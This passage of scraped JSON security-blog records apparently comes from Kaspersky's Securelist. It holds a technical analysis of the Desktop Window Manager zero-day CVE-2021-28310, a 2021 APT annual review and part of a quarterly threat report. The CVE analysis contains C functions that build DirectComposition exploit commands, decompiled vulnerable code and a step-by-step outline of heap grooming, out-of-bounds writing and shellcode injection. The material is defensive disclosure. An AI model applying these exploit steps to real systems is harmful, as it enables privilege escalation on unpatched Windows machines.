vulnerabilities.\n\n \nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We&#x27;ve already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string &quot;NtDComposition&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet&#x27;s take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty&lt;D2DVector2&gt;(\u2026) or CPropertySet::UpdateProperty&lt;D2DVector2&gt;(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty&lt;D2DVector2&gt;(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that&#x27;s not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty&lt;D2DVector2&gt;(\u2026) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n (1)\tstorageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn&#x27;t analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won&#x27;t be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty&lt;D2DVector2&gt;(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty&lt;D2DVector2&gt;(\u2026), which are very similar to those present in dwmcore.dll (it&#x27;s quite likely they were copy-pasted). However, the kernel version of the UpdateProperty&lt;D2DVector2&gt; function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty&lt;D2DVector2&gt;(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty&lt;D2DVector2&gt; function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty&lt;D2DVector2&gt;(\u2026) comes in to play. The kernel version of the AddProperty&lt;D2DVector2&gt; function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it&#x27;s possible to use the AddProperty&lt;D2DVector2&gt; function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).\n\nInconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend Microsoft to change the behavior of the AddProperty function and check properties before they are added.\n\nThe whole exploitation process for the discovered exploit is as follows:\n\n 1. Create a large number of resources with properties of specific size to get heap into predictable state.\n 2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.\n 3. Release resources created at stage 2.\n 4. Create additional resources with properties. These resources will be used to perform OOB writes.\n 5. Make holes among resources created at stage 1.\n 6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.\n 7. Create &quot;special&quot; properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.\n 8. Use OOB write vulnerability to write shellcode, create an object and get code execution.\n 9. Inject additional shellcode into another system process.\n\nKaspersky products detect this exploit with the verdicts:\n\n * HEUR:Exploit.Win32.Generic\n * HEUR:Trojan.Win32.Generic\n * PDM:Exploit.Win32.Generic", "cvss3": {}, "published": "2021-04-13T17:35:50", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it&#x27;s important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International&#x27;s Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India&#x27;s Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with &quot;malicious malware and spyware&quot;.\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company&#x27;s Orion IT, a solution for monitoring and managing customers&#x27; IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority&#x27;s website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user&#x27;s execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called &quot;limited and targeted attacks&quot;. At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity&#x27;s telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG&#x27;s blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group&#x27;s ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren&#x27;t able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren&#x27;t able to capture a full exploit chain, so we don&#x27;t know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn&#x27;t find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for &quot;legal surveillance&quot; purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it&#x27;s not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor&#x27;s activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous &quot;DLL side-loading triad&quot;: a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar &quot;triads&quot;, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called &quot;FoundCore&quot;, which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the &#x27;[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)&#x27; report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the &#x27;[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)&#x27; post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed &quot;Moriya&quot;, was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named &quot;[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)&quot;. The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker&#x27;s infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker&#x27;s origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS 